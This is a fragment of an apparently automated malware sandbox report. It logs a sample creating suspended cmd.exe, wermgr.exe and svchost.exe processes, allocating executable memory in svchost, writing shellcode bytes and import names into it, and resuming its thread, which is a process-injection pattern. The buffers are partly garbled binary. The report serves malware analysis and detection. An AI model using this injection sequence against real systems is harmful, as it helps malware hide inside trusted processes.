NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1

Potential code injection by writing to the memory of another process (50 out of 399 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: VERSION.dll base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: oåv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: VerQueryValueA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: KERNEL32.dll base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: oåv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetLastError base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapFree base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapSize base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapReAlloc base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: HeapAlloc base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetProcessHeap base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: lstrlenA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: lstrcpyA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: EnterCriticalSection base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: LeaveCriticalSection base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: InitializeCriticalSection base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1836 resumed a thread in remote process 1016
NtResumeThread Sept. 23, 2021, 5:16 p.m.	thread_handle: 0x00000000000003ec suspend_count: 1 process_identifier: 1016	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 684 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 23, 2021, 5:15 p.m.	thread_identifier: 2428 thread_handle: 0x00000104 process_identifier: 2076 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000108	1	1
CreateProcessInternalW Sept. 23, 2021, 5:15 p.m.	thread_identifier: 3016 thread_handle: 0x00000108 process_identifier: 1836 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\wermgr.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000104	1	1
CreateProcessInternalW Sept. 23, 2021, 5:16 p.m.	thread_identifier: 2648 thread_handle: 0x00000000000003ec process_identifier: 1016 current_directory: filepath: track: 1 command_line: C:\Windows\system32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGX D$\D$\ø uWHw`HkFHD$PHD$PH=u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\øÅ3Àé\ÿÿÿHD$PH=«uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHø9uLF HNHVÿëÌÿëÈHD$PHøuHNÿëµHD$PHø&GÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtResumeThread Sept. 23, 2021, 5:16 p.m.	thread_handle: 0x00000000000003ec suspend_count: 1 process_identifier: 1016	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0000000180000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000000000003f0	1	0
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: VERSION.dll base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: oåv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: VerQueryValueA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetFileVersionInfoSizeA base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6ævxüþ& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: KERNEL32.dll base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: oåv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: GetLastError base_address: 0x0000000000260000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
NtAllocateVirtualMemory Sept. 23, 2021, 5:16 p.m.	process_identifier: 1016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f0	1	0
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: 6æväv& base_address: 0x0000000000270000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
WriteProcessMemory Sept. 23, 2021, 5:16 p.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww' base_address: 0x00000000000a0000 process_identifier: 1016 process_handle: 0x00000000000003f0	1	1
